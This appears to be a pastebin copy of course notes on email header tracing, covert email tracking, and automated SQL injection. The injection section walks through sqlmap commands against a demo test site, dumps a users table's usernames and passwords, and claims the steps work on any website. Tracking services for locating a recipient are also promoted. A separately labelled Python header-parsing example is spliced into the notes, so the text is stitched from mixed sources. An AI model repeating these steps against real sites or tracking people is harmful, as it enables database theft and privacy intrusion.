· 6 years ago · Nov 19, 2019, 03:54 AM
Email Tracing & Tracking


Source : From where we received a mail <--- Email Tracing

Destination : To whom you send a mail <-- Email Tracking
---------------------------------------

Automated SQL Injection - CLI
Automated SQL Injection - GUI


-------

Email Tracing :
===============

PM : I ll kill u <-- Any such mail is coming


From where is this mail coming..!!!


Every mail comes with : Header


Header : It contains the information of the sender

Server Information (Gmail.com / emkei.cz / 000website etc)

Sometimes, we can also get to know the IP address of the sender (mostly in Yahoo Mail)

----


How to see the Header


Step 1: Open a Mail


Step 2: Show Option --> Show Original / Show Header / Show Source


Step 3: Line : "Received: from" : This would contain the IP of the sender (own IP or the mail server's - confirm with ip2location)
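
Step 3 done programmatically, as an added example that is not part of the original notes: it walks the Received lines of a raw message from the oldest hop to the newest and picks the first non-internal IP. The sample message, host names and addresses (documentation ranges) and the function names are constructed for illustration.

```python
import email
import ipaddress
import re

# Constructed sample message: hosts and IPs come from documentation ranges.
RAW = """\
Received: from mx.example.net (mx.example.net [198.51.100.25])
\tby mail.example.org with ESMTPS id abc123;
\tTue, 19 Nov 2019 03:50:12 +0000
Received: from [192.168.1.44] (unknown [203.0.113.77])
\tby mx.example.net with ESMTPSA id xyz789;
\tTue, 19 Nov 2019 03:50:10 +0000
From: sender@example.net
To: recipient@example.org
Subject: test

body
"""

IP_RE = re.compile(r"\[(?:IPv6:)?([0-9A-Fa-f:.]+)\]")
# Address ranges that never identify a host on the public Internet.
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def received_hops(raw):
    """Return one dict per Received line, oldest hop first."""
    msg = email.message_from_string(raw)
    hops = []
    # Every relay prepends its own Received line, so the last one is the oldest.
    for value in reversed(msg.get_all("Received", [])):
        text = " ".join(value.split())          # unfold continuation lines
        by = re.search(r"\bby\s+(\S+)", text)
        ips = []
        for cand in IP_RE.findall(text.split(" by ")[0]):
            try:
                ips.append(ipaddress.ip_address(cand))
            except ValueError:
                pass                            # bracketed text that is not an IP
        hops.append({"by": by.group(1) if by else None, "ips": ips})
    return hops

def likely_origin(raw):
    """First non-internal IP, searching from the oldest hop; None if absent."""
    # Lines below the first server you trust can be forged by the sender,
    # and with webmail this is often the provider's server, not the device.
    for hop in received_hops(raw):
        for ip in hop["ips"]:
            if not any(ip in net for net in INTERNAL):
                return str(ip)
    return None
```
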


---

Puneet ---> Palvinder

If we want to locate a person by using mail --> Simply send a mail --> Email Tracking

Details that we can collect about the receiver:

1. IP Address

2. Open | Delivered

3. Devices

4. Read Duration

5. Click on Links.??

-----

www.whoreadme.com <-- Easy to Use

or

www.getnotify.com

-----

EMAIL TRACKING FOR GMAIL : Addon - Mail Track

--------------------------------------------

Automated SQL Injection - CLI
===============================


Kali Linux :

Union Based Injection

Tool : SQLMAP


Target : PHP or ASP (the steps below are the same)


It is pre-installed in Kali Linux; this tool takes only 4 steps

Need for this tool : Just a website that uses the GET method.


Target : http://testphp.vulnweb.com/listproducts.php?cat=1


Step 1: Open Terminal


Step 2: Find Database Name of Target Website

# sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

-u = URL

--dbs = Database Name


Output :

available databases [2]:
[*] acuart <-----
[*] information_schema


Database ---> Tables ---> Columns ---> Data

Step 3: Find Tables

# sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --tables -D acuart

--tables = We need Tables

-D = From which Database


Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     | <-----
+-----------+

Step 4: Get Columns

# sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --columns -T users -D acuart

--columns = We need columns

-T = Name of the Table


Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) | <----
| phone   | varchar(100) |
| uname   | varchar(100) | <-----
+---------+--------------+

Step 5: Get Data


# sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dump -C uname,pass -T users -D acuart

fetching entries of column(s) 'pass, uname' for table 'users' in database 'acuart'
Database: acuart
Table: users
[1 entry]
+-------+------+
| uname | pass |
+-------+------+
| test  | test |
+-------+------+


The above steps are the same for every website; only the website name changes


Automated SQL Injection - GUI
=============================

Tool : Havij

Windows OS


Simple, even a 5th class student can hack into any website

Let's see.

Download :

Manual : Yes

Automated : Yes <---- SQLMAP (Authenticated Tool in Kali)

---------------------

USA : CompTIA or EC-Council -- Exam Directly

3 Years <-- OSCP - 48 Hours Regular (65000) - Articles + Practice CTF

24 Hour <--- No Break

Next --> 4-5 Hour

---------------------

OSWP : <----